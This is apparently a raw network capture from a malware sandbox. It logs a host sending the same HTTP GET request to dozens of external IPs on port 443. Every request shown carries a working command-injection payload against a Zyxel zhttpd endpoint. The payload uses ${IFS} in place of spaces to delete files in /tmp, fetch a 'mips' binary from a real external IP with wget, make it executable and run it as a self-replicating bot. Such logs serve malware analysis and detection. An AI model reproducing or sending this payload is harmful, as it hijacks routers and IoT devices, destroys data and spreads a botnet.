                              Mar 31, 2024 08:41:19.726766109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3446192.168.2.1339810217.3.219.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726811886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3447192.168.2.1339712136.160.1.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726834059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3448192.168.2.1359860146.11.207.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726881981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3449192.168.2.1351838125.160.58.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726917028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3450192.168.2.135254697.12.86.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726965904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3451192.168.2.133958849.103.36.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.726989985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3452192.168.2.1352248220.52.130.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727046967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3453192.168.2.1342832218.111.209.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727088928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3454192.168.2.1346382207.57.24.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727123976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3455192.168.2.1338070123.127.41.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727178097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3456192.168.2.1340072184.202.138.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727236986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3457192.168.2.133638054.212.208.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727267027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3458192.168.2.1349608139.234.93.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727319956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3459192.168.2.1338434106.120.206.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727354050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3460192.168.2.1337006209.35.154.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727407932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3461192.168.2.1348818143.102.12.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727458954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3462192.168.2.1333576137.126.12.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727500916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3463192.168.2.134249660.6.180.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727545977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3464192.168.2.1356866163.129.142.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727582932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3465192.168.2.133527094.79.89.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727612972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3466192.168.2.133369248.106.5.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727664948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3467192.168.2.1337480136.211.114.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727679968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3468192.168.2.134738275.56.157.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.727716923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3469192.168.2.135013054.228.16.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731457949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3470192.168.2.1333216145.125.234.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731488943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3471192.168.2.133339474.21.0.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731549978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3472192.168.2.1358342105.97.229.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731579065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3473192.168.2.1351900212.199.113.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731623888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3474192.168.2.1333404168.170.155.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731681108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3475192.168.2.1345234152.85.32.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731705904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3476192.168.2.1353386216.58.67.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731745005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3477192.168.2.1333802128.217.30.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731764078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3478192.168.2.1357542159.190.27.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.731807947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3479192.168.2.1355456189.234.145.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734555006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3480192.168.2.1357776126.198.183.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734608889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3481192.168.2.1341866160.227.193.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734730959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3482192.168.2.1340470121.85.170.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734776974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3483192.168.2.1340422180.70.169.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734925032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3484192.168.2.1339450189.190.146.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734954119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3485192.168.2.1346354140.18.76.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.734976053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3486192.168.2.135233036.223.109.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735023022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3487192.168.2.1338734129.1.51.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735074043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3488192.168.2.1350842109.199.190.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735127926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3489192.168.2.1355588121.10.139.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735182047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3490192.168.2.1344360107.105.58.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735213041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3491192.168.2.1357696129.91.123.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735265970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3492192.168.2.13416884.214.130.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735301971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3493192.168.2.1336664178.135.52.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735352993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3494192.168.2.1345808112.166.201.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735394001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3495192.168.2.1353626173.15.200.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735431910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3496192.168.2.1337530147.117.131.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735485077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3497192.168.2.1354716199.185.109.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735536098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3498192.168.2.134043880.10.137.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735585928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3499192.168.2.1344878139.36.90.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735624075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3500192.168.2.1346644107.227.119.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735677958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3501192.168.2.1356710200.199.136.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735707998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3502192.168.2.133465869.55.43.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735764027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3503192.168.2.1350656132.219.88.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735796928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3504192.168.2.1339452151.169.240.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735847950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3505192.168.2.134103431.237.64.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735879898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3506192.168.2.134977677.51.138.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735934973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3507192.168.2.1353658125.172.34.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.735977888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3508192.168.2.135924092.255.154.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736004114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3509192.168.2.1358002141.201.121.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736052036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3510192.168.2.134072490.188.249.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736088991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3511192.168.2.135303075.9.250.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736145973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3512192.168.2.1338106154.58.164.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736196041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3513192.168.2.134136083.126.168.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736258984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3514192.168.2.1348802193.124.57.39443
                              TimestampBytes transferredDirectionData
